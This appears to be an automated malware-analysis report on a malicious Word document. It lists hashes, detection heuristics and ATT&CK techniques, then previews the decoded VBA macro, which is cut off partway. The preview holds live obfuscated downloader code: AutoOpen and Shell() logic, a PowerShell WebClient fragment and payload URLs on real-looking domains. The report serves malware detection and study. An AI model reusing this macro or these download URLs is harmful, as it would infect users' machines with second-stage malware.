Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 456f848736a53da7…

MALICIOUS

Office (OLE)

Size: 160.5 KB
Created: 2017-11-27 20:30:00
Authoring application: Microsoft Office Word
First seen: 2017-12-08
MD5: ac26fa09bfd77a7c27b074cb73e7e769
SHA-1: d23dce72e850391efbdb87a4b73e459d8f6c0880
SHA-256: 456f848736a53da76ecff983f9be3f2fabb8aacb6e6117a48d776e113d8d9d45
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The file contains a VBA macro with an AutoOpen function, a common technique for executing malicious code as soon as a document is opened. The macro calls the Shell() function, indicating an attempt to execute an external command. That command likely downloads and executes a second-stage payload, as suggested by the embedded URL and the ClamAV detection for obfuscated macro malware. The URL string extracted from the document body, shown as-is and still carrying the macro's string-obfuscation filler, is http://wwwwpq+wpq.wpq+wpqinwpq+wpqdpwpq+wpqtwpq+wpqs.cowpq+4kFiDPPF53bjwNKFql3ssEs.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6387400-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://wwwwpq+wpq.wpq+wpqinwpq+wpqdpwpq+wpqtwpq+wpqs.cowpq+4kFiDPPF53bjwNKFql3ssEs [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 80246 bytes
SHA-256: 783bd21516710efc8ce978df9546bc2e0af5dc0c55669ec033438d0d4a8ca30f

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wAZTmAuKC"
Function KRCtkpfTB()
qABlZrS = Array(StrReverse("dmbajhqpfN"), StrReverse("MmupaaAKYv"), StrReverse("QwJfzmKEtF"), StrReverse("zqizfEficE"), StrReverse("RnSjMGLphB"), StrReverse("kiXvAfcwdz"), StrReverse("WlwaOWDvKV"), StrReverse("vShTdcfdTq"))
OLhzi = Mid("GHNUp'+'q+wpqtwpq+wpqrwp75p+75pq+wpqy{wpq+wp'+'qD3hWdVWcvqoiwXv1NZB1jnwPv9qMO", 5, 46)
TAKXT = Array(StrReverse("IqTaifnapI"), StrReverse("KoTzXGRdYJ"), StrReverse("vPFuKZpjRd"), StrReverse("WCLVFwMKwQ"), StrReverse("hJWJDtvDEq"), StrReverse("tpMVqslZPJ"), StrReverse("qHJMlIdztY"), StrReverse("tGiHbltvqQ"))
DiOrWzuNzoF = Array(StrReverse("aVXsUQTnwA"), StrReverse("cjEfhjrsRq"), StrReverse("DPiMFSBDSX"), StrReverse("zzcnWAOEGw"), StrReverse("DQwKtMOCmw"), StrReverse("lnLdnLqLmB"), StrReverse("OPVbAdGQIj"), StrReverse("SmmTmmTUSt"))
JqYPjk = Array(StrReverse("iSHqItMpEq"), StrReverse("IlJEbuzQik"), StrReverse("EvaQJzTocp"), StrReverse("ZKiaHsnSqZ"), StrReverse("aUVRLDkZuj"), StrReverse("BQRzLisrhL"), StrReverse("aYNPQwHiwi"), StrReverse("GiZEJjaJFG"))
lFVOT = Mid("WMGYUwOu]A19VERBosEprEFEREncE)[75p+75p1,3]+wpq75p+75pXwpq-JOINwpqwpq)75p)-REpLacE  7'+'5pwpq75p,[cHaR]39  -CRePLaCe '+' 75pA'+'1975p,[cHaR]36-REpLacE ([cHaR]49+['+'cHaR]72+[cHaR]71)'+',[cHaR]124) ) ')ZQmZ", 9, 192)
iPHlzTQvRb = Array(StrReverse("EzRVlMnzAL"), StrReverse("JDREjnuVJQ"), StrReverse("FztFizArqA"), StrReverse("rWsszPwAqn"), StrReverse("pGQzXPUhkz"), StrReverse("rwKCoGGMqm"), StrReverse("LvJzTnKZHU"), StrReverse("puiWazhvhP"))
paIdrfPIcWq = Array(StrReverse("MttvnJtjPZ"), StrReverse("AwlfzCGFAM"), StrReverse("wCdLZWrMob"), StrReverse("IilazjiRcH"), StrReverse("FaTXiJtuFG"), StrReverse("cUIsJKQiWQ"), StrReverse("SjsnRRKKfS"), StrReverse("XodtHViGdP"))
EzYJOAM = Array(StrReverse("uYKCAXJrqt"), StrReverse("nCMchjIPbw"), StrReverse("jEtlhPNYoi"), StrReverse("DImqRXAFcq"), StrReverse("zAzifwLNur"), StrReverse("ZaznZpiZVl"), StrReverse("KkDIpfQWLJ"), StrReverse("jDnlwiGPFi"))
ilHYLdZBM = Mid("in4jLFozGO79mSWwwpqm/wpq+wpqUHwpq+wpqSD/,http:/wpq+wpq/w'+'w75p+75pw.fwpq+wpq75p+75pingerfwpq+wpqun.cwpq+wpqo'+'.uk/wpq75p+75p+wpqnpZdQQy/,http'+'://'+'w75p+75pwwpq+wp'+'qw.wpq+wpqrelicswpq'+'+75p+75pwpqtone'+'wppjpAHOISYXqajd", 17, 196)
ttlfbcG = Array(StrReverse("dwHhznatRp"), StrReverse("QwvLpZifFQ"), StrReverse("zjPmjnqPln"), StrReverse("bJEGnVYKod"), StrReverse("rRtqCbtSEi"), StrReverse("nDANQthVwL"), StrReverse("wLIdOGroYT"), StrReverse("AYqcYiqYjI"))
sGoQnw = Array(StrReverse("DzdwJdLwRc"), StrReverse("sajrjMwppA"), StrReverse("ipClLVmLoq"), StrReverse("iPUmiLGGzL"), StrReverse("TRFiRFTwEl"), StrReverse("mRZFANwskn"), StrReverse("qzJaucGzIV"), StrReverse("FqpdjQkUUG"))
mwasSZqGVzj = Array(StrReverse("cznMcWwsXF"), StrReverse("wVjOosCJwT"), StrReverse("BcCokGzUdA"), StrReverse("UEtifrHcYV"), StrReverse("pzTVYGRsXJ"), StrReverse("EBCJnzvwcV"), StrReverse("WcOXkrbBiw"), StrReverse("kakadDIjQi"))
idTIuBzuoEr = Mid("lq5ewpq+wpqct System.Net.WebCliwpq+wpqe'+'ntwpq+wpq;D3wnswpq+wpqadwpq+wpqawpq+wpq'+'sd wpq+wp75p'+'+75pq= nwpq+wpqew-wpq'+'+wpqo75p+75pwpq+wpqbject ranwpq+wpqjuGcInsCzNi", 4, 154)
YslWGEQOij = Array(StrReverse("CqHCEQqOlU"), StrReverse("OOWMUUIioo"), StrReverse("wWnjjwbvZk"), StrReverse("ccYilAsGWd"), StrReverse("msLoGrTdIM"), StrReverse("IGffHfDXWI"), StrReverse("pupBsmqrbU"), StrReverse("bBHLCGLwdo"))
zBspwbYqGi = Array(StrReverse("pGzTwTCkuj"), StrReverse("wIADwNiwlj"), StrReverse("iPJaYiQcjk"), StrReverse("qOizfQfuaQ"), StrReverse("prHCAcZhbQ"), StrReverse("UMvjAZwWuR"), StrReverse("DaDKqiZCXi"), StrReverse("inWUrnIHaw"))
BitbrCA = Array(StrReverse("scUQNGtoEj"), StrReverse("vRGLWWVUdk"), StrReverse("OmRMmAJuES"), StrReverse("PjdaqLYpXi"), StrReverse("kWzPwXsrdj"), StrReverse("GzPutGKHdN"), StrReverse("zzjlROojUL"), StrReverse("wfzuzroCOP"))
tPZKCocAajb = Mid("LfwI8wqs
... (truncated)